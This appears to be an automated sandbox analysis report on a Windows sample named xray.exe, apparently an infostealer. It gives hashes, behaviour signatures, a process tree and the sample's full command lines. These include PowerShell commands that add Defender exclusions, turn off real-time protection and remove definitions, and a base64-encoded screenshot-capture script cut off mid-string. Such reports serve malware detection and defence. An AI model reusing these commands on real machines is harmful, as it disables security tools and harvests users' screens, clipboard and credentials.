Analysis
-
max time kernel
94s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11/01/2025, 07:39
Behavioral task
behavioral1
Sample
xray.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
xray.exe
Resource
win10v2004-20241007-en
General
-
Target
xray.exe
-
Size
5.9MB
-
MD5
08eca9171f36a8870b914cc3483289ad
-
SHA1
ad19c17528e1729fcc886b81a75459fa166e8333
-
SHA256
be86be2ed524d887a9fb5915be201c5f45c8fb40cac116b3156fca4c65e562be
-
SHA512
4771a72151ddafd37c06bbf1e3c4f4a4a0273bf37aac5fc2827aad15a30eee86793885450b8fbb0b368bf752770032340ccc5a570383deb8679577442b205b72
-
SSDEEP
98304:GEmoDUN43Wlmk3ZjOjFgFEblNHYSxTpirSHcUR43zrwkdA8QJCKC7bN3mb6aitMr:GEumWzOjmFwDRxtYSHdK34kdai7bN3ml
Malware Config
Signatures
-
pid Process 2852 powershell.exe 3852 powershell.exe 3636 powershell.exe 220 powershell.exe 4260 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts xray.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 2728 powershell.exe 4276 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2592 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 4256 xray.exe 4256 xray.exe 4256 xray.exe 4256 xray.exe 4256 xray.exe 4256 xray.exe 4256 xray.exe 4256 xray.exe 4256 xray.exe 4256 xray.exe 4256 xray.exe 4256 xray.exe 4256 xray.exe 4256 xray.exe 4256 xray.exe 4256 xray.exe 4256 xray.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 20 discord.com 21 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 5044 tasklist.exe 1908 tasklist.exe 1164 tasklist.exe 4340 tasklist.exe -
resource yara_rule behavioral2/files/0x0008000000023c65-21.dat upx behavioral2/memory/4256-25-0x00007FFC364D0000-0x00007FFC36936000-memory.dmp upx behavioral2/files/0x0008000000023c2c-27.dat upx behavioral2/files/0x0008000000023c63-29.dat upx behavioral2/memory/4256-30-0x00007FFC3B790000-0x00007FFC3B7B4000-memory.dmp upx behavioral2/memory/4256-32-0x00007FFC3FEE0000-0x00007FFC3FEEF000-memory.dmp upx behavioral2/files/0x0008000000023c57-34.dat upx behavioral2/files/0x000b000000023c4c-48.dat upx behavioral2/files/0x0008000000023c37-47.dat upx behavioral2/files/0x0008000000023c36-46.dat upx behavioral2/files/0x0008000000023c35-45.dat upx behavioral2/files/0x0008000000023c34-44.dat upx behavioral2/files/0x0008000000023c33-43.dat upx behavioral2/files/0x0008000000023c32-42.dat upx behavioral2/files/0x0008000000023c1a-41.dat upx behavioral2/files/0x0008000000023c6a-40.dat upx behavioral2/files/0x0008000000023c69-39.dat upx behavioral2/files/0x0008000000023c68-38.dat upx behavioral2/files/0x0008000000023c64-35.dat upx behavioral2/memory/4256-54-0x00007FFC372F0000-0x00007FFC3731C000-memory.dmp upx behavioral2/memory/4256-58-0x00007FFC370B0000-0x00007FFC370CF000-memory.dmp upx behavioral2/memory/4256-57-0x00007FFC372D0000-0x00007FFC372E8000-memory.dmp upx behavioral2/memory/4256-60-0x00007FFC27A60000-0x00007FFC27BDA000-memory.dmp upx behavioral2/memory/4256-67-0x00007FFC36AC0000-0x00007FFC36AEE000-memory.dmp upx behavioral2/memory/4256-66-0x00007FFC364D0000-0x00007FFC36936000-memory.dmp upx behavioral2/memory/4256-73-0x00007FFC276E0000-0x00007FFC27A59000-memory.dmp upx behavioral2/memory/4256-77-0x00007FFC372F0000-0x00007FFC3731C000-memory.dmp upx behavioral2/memory/4256-84-0x00007FFC275C0000-0x00007FFC276D8000-memory.dmp upx behavioral2/memory/4256-83-0x00007FFC370B0000-0x00007FFC370CF000-memory.dmp upx behavioral2/memory/4256-79-0x00007FFC393D0000-0x00007FFC393DD000-memory.dmp upx behavioral2/memory/4256-85-0x00007FFC27A60000-0x00007FFC27BDA000-memory.dmp upx behavioral2/memory/4256-78-0x00007FFC36AA0000-0x00007FFC36AB5000-memory.dmp upx behavioral2/memory/4256-88-0x00007FFC36B40000-0x00007FFC36B59000-memory.dmp upx behavioral2/memory/4256-72-0x00007FFC3B790000-0x00007FFC3B7B4000-memory.dmp upx behavioral2/memory/4256-69-0x00007FFC362C0000-0x00007FFC36378000-memory.dmp upx behavioral2/memory/4256-64-0x00007FFC395B0000-0x00007FFC395BD000-memory.dmp upx behavioral2/memory/4256-63-0x00007FFC36B40000-0x00007FFC36B59000-memory.dmp upx behavioral2/memory/4256-167-0x00007FFC36AC0000-0x00007FFC36AEE000-memory.dmp upx behavioral2/memory/4256-242-0x00007FFC362C0000-0x00007FFC36378000-memory.dmp upx behavioral2/memory/4256-265-0x00007FFC276E0000-0x00007FFC27A59000-memory.dmp upx behavioral2/memory/4256-308-0x00007FFC370B0000-0x00007FFC370CF000-memory.dmp upx behavioral2/memory/4256-309-0x00007FFC27A60000-0x00007FFC27BDA000-memory.dmp upx behavioral2/memory/4256-303-0x00007FFC364D0000-0x00007FFC36936000-memory.dmp upx behavioral2/memory/4256-304-0x00007FFC3B790000-0x00007FFC3B7B4000-memory.dmp upx behavioral2/memory/4256-318-0x00007FFC364D0000-0x00007FFC36936000-memory.dmp upx behavioral2/memory/4256-337-0x00007FFC372D0000-0x00007FFC372E8000-memory.dmp upx behavioral2/memory/4256-342-0x00007FFC362C0000-0x00007FFC36378000-memory.dmp upx behavioral2/memory/4256-341-0x00007FFC395B0000-0x00007FFC395BD000-memory.dmp upx behavioral2/memory/4256-340-0x00007FFC36B40000-0x00007FFC36B59000-memory.dmp upx behavioral2/memory/4256-339-0x00007FFC36AC0000-0x00007FFC36AEE000-memory.dmp upx behavioral2/memory/4256-338-0x00007FFC27A60000-0x00007FFC27BDA000-memory.dmp upx behavioral2/memory/4256-336-0x00007FFC372F0000-0x00007FFC3731C000-memory.dmp upx behavioral2/memory/4256-335-0x00007FFC3FEE0000-0x00007FFC3FEEF000-memory.dmp upx behavioral2/memory/4256-334-0x00007FFC3B790000-0x00007FFC3B7B4000-memory.dmp upx behavioral2/memory/4256-333-0x00007FFC370B0000-0x00007FFC370CF000-memory.dmp upx behavioral2/memory/4256-332-0x00007FFC275C0000-0x00007FFC276D8000-memory.dmp upx behavioral2/memory/4256-331-0x00007FFC393D0000-0x00007FFC393DD000-memory.dmp upx behavioral2/memory/4256-330-0x00007FFC36AA0000-0x00007FFC36AB5000-memory.dmp upx behavioral2/memory/4256-329-0x00007FFC276E0000-0x00007FFC27A59000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3784 cmd.exe 2516 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2444 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3896 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 2852 powershell.exe 220 powershell.exe 2852 powershell.exe 220 powershell.exe 4260 powershell.exe 4260 powershell.exe 4260 powershell.exe 4260 powershell.exe 2728 powershell.exe 2728 powershell.exe 4144 powershell.exe 4144 powershell.exe 2728 powershell.exe 4144 powershell.exe 3852 powershell.exe 3852 powershell.exe 3852 powershell.exe 4072 powershell.exe 4072 powershell.exe 3636 powershell.exe 3636 powershell.exe 2876 powershell.exe 2876 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2852 powershell.exe Token: SeDebugPrivilege 220 powershell.exe Token: SeDebugPrivilege 5044 tasklist.exe Token: SeDebugPrivilege 1908 tasklist.exe Token: SeDebugPrivilege 4260 powershell.exe Token: SeIncreaseQuotaPrivilege 1404 WMIC.exe Token: SeSecurityPrivilege 1404 WMIC.exe Token: SeTakeOwnershipPrivilege 1404 WMIC.exe Token: SeLoadDriverPrivilege 1404 WMIC.exe Token: SeSystemProfilePrivilege 1404 WMIC.exe Token: SeSystemtimePrivilege 1404 WMIC.exe Token: SeProfSingleProcessPrivilege 1404 WMIC.exe Token: SeIncBasePriorityPrivilege 1404 WMIC.exe Token: SeCreatePagefilePrivilege 1404 WMIC.exe Token: SeBackupPrivilege 1404 WMIC.exe Token: SeRestorePrivilege 1404 WMIC.exe Token: SeShutdownPrivilege 1404 WMIC.exe Token: SeDebugPrivilege 1404 WMIC.exe Token: SeSystemEnvironmentPrivilege 1404 WMIC.exe Token: SeRemoteShutdownPrivilege 1404 WMIC.exe Token: SeUndockPrivilege 1404 WMIC.exe Token: SeManageVolumePrivilege 1404 WMIC.exe Token: 33 1404 WMIC.exe Token: 34 1404 WMIC.exe Token: 35 1404 WMIC.exe Token: 36 1404 WMIC.exe Token: SeDebugPrivilege 1164 tasklist.exe Token: SeIncreaseQuotaPrivilege 1404 WMIC.exe Token: SeSecurityPrivilege 1404 WMIC.exe Token: SeTakeOwnershipPrivilege 1404 WMIC.exe Token: SeLoadDriverPrivilege 1404 WMIC.exe Token: SeSystemProfilePrivilege 1404 WMIC.exe Token: SeSystemtimePrivilege 1404 WMIC.exe Token: SeProfSingleProcessPrivilege 1404 WMIC.exe Token: SeIncBasePriorityPrivilege 1404 WMIC.exe Token: SeCreatePagefilePrivilege 1404 WMIC.exe Token: SeBackupPrivilege 1404 WMIC.exe Token: SeRestorePrivilege 1404 WMIC.exe Token: SeShutdownPrivilege 1404 WMIC.exe Token: SeDebugPrivilege 1404 WMIC.exe Token: SeSystemEnvironmentPrivilege 1404 WMIC.exe Token: SeRemoteShutdownPrivilege 1404 WMIC.exe Token: SeUndockPrivilege 1404 WMIC.exe Token: SeManageVolumePrivilege 1404 WMIC.exe Token: 33 1404 WMIC.exe Token: 34 1404 WMIC.exe Token: 35 1404 WMIC.exe Token: 36 1404 WMIC.exe Token: SeDebugPrivilege 2728 powershell.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeDebugPrivilege 3852 powershell.exe Token: SeDebugPrivilege 4340 tasklist.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeIncreaseQuotaPrivilege 3684 WMIC.exe Token: SeSecurityPrivilege 3684 WMIC.exe Token: SeTakeOwnershipPrivilege 3684 WMIC.exe Token: SeLoadDriverPrivilege 3684 WMIC.exe Token: SeSystemProfilePrivilege 3684 WMIC.exe Token: SeSystemtimePrivilege 3684 WMIC.exe Token: SeProfSingleProcessPrivilege 3684 WMIC.exe Token: SeIncBasePriorityPrivilege 3684 WMIC.exe Token: SeCreatePagefilePrivilege 3684 WMIC.exe Token: SeBackupPrivilege 3684 WMIC.exe Token: SeRestorePrivilege 3684 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3780 wrote to memory of 4256 3780 xray.exe 82 PID 3780 wrote to memory of 4256 3780 xray.exe 82 PID 4256 wrote to memory of 1852 4256 xray.exe 83 PID 4256 wrote to memory of 1852 4256 xray.exe 83 PID 4256 wrote to memory of 1824 4256 xray.exe 84 PID 4256 wrote to memory of 1824 4256 xray.exe 84 PID 4256 wrote to memory of 3888 4256 xray.exe 87 PID 4256 wrote to memory of 3888 4256 xray.exe 87 PID 1824 wrote to memory of 2852 1824 cmd.exe 89 PID 1824 wrote to memory of 2852 1824 cmd.exe 89 PID 3888 wrote to memory of 220 3888 cmd.exe 90 PID 3888 wrote to memory of 220 3888 cmd.exe 90 PID 4256 wrote to memory of 2420 4256 xray.exe 91 PID 4256 wrote to memory of 2420 4256 xray.exe 91 PID 4256 wrote to memory of 2076 4256 xray.exe 92 PID 4256 wrote to memory of 2076 4256 xray.exe 92 PID 1852 wrote to memory of 4260 1852 cmd.exe 95 PID 1852 wrote to memory of 4260 1852 cmd.exe 95 PID 2076 wrote to memory of 1908 2076 cmd.exe 153 PID 2076 wrote to memory of 1908 2076 cmd.exe 153 PID 2420 wrote to memory of 5044 2420 cmd.exe 97 PID 2420 wrote to memory of 5044 2420 cmd.exe 97 PID 4256 wrote to memory of 3240 4256 xray.exe 98 PID 4256 wrote to memory of 3240 4256 xray.exe 98 PID 4256 wrote to memory of 4276 4256 xray.exe 99 PID 4256 wrote to memory of 4276 4256 xray.exe 99 PID 4256 wrote to memory of 860 4256 xray.exe 101 PID 4256 wrote to memory of 860 4256 xray.exe 101 PID 4256 wrote to memory of 1848 4256 xray.exe 106 PID 4256 wrote to memory of 1848 4256 xray.exe 106 PID 4256 wrote to memory of 3784 4256 xray.exe 105 PID 4256 wrote to memory of 3784 4256 xray.exe 105 PID 4256 wrote to memory of 1532 4256 xray.exe 107 PID 4256 wrote to memory of 1532 4256 xray.exe 107 PID 4256 wrote to memory of 4820 4256 xray.exe 110 PID 4256 wrote to memory of 4820 4256 xray.exe 110 PID 4256 wrote to memory of 3156 4256 xray.exe 103 PID 4256 wrote to memory of 3156 4256 xray.exe 103 PID 3240 wrote to memory of 1404 3240 cmd.exe 115 PID 3240 wrote to memory of 1404 3240 cmd.exe 115 PID 3156 wrote to memory of 2468 3156 cmd.exe 139 PID 3156 wrote to memory of 2468 3156 cmd.exe 139 PID 3784 wrote to memory of 2516 3784 cmd.exe 117 PID 3784 wrote to memory of 2516 3784 cmd.exe 117 PID 1532 wrote to memory of 228 1532 cmd.exe 121 PID 1532 wrote to memory of 228 1532 cmd.exe 121 PID 860 wrote to memory of 1164 860 cmd.exe 118 PID 860 wrote to memory of 1164 860 cmd.exe 118 PID 4276 wrote to memory of 2728 4276 cmd.exe 119 PID 4276 wrote to memory of 2728 4276 cmd.exe 119 PID 1848 wrote to memory of 3896 1848 cmd.exe 120 PID 1848 wrote to memory of 3896 1848 cmd.exe 120 PID 4820 wrote to memory of 4144 4820 cmd.exe 122 PID 4820 wrote to memory of 4144 4820 cmd.exe 122 PID 4256 wrote to memory of 2644 4256 xray.exe 123 PID 4256 wrote to memory of 2644 4256 xray.exe 123 PID 4256 wrote to memory of 1168 4256 xray.exe 125 PID 4256 wrote to memory of 1168 4256 xray.exe 125 PID 2644 wrote to memory of 804 2644 cmd.exe 127 PID 2644 wrote to memory of 804 2644 cmd.exe 127 PID 1168 wrote to memory of 5100 1168 cmd.exe 128 PID 1168 wrote to memory of 5100 1168 cmd.exe 128 PID 4256 wrote to memory of 2192 4256 xray.exe 130 PID 4256 wrote to memory of 2192 4256 xray.exe 130 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 5100 attrib.exe 3636 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\xray.exe"C:\Users\Admin\AppData\Local\Temp\xray.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Users\Admin\AppData\Local\Temp\xray.exe"C:\Users\Admin\AppData\Local\Temp\xray.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\xray.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\xray.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:3240 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:2468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:3896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAg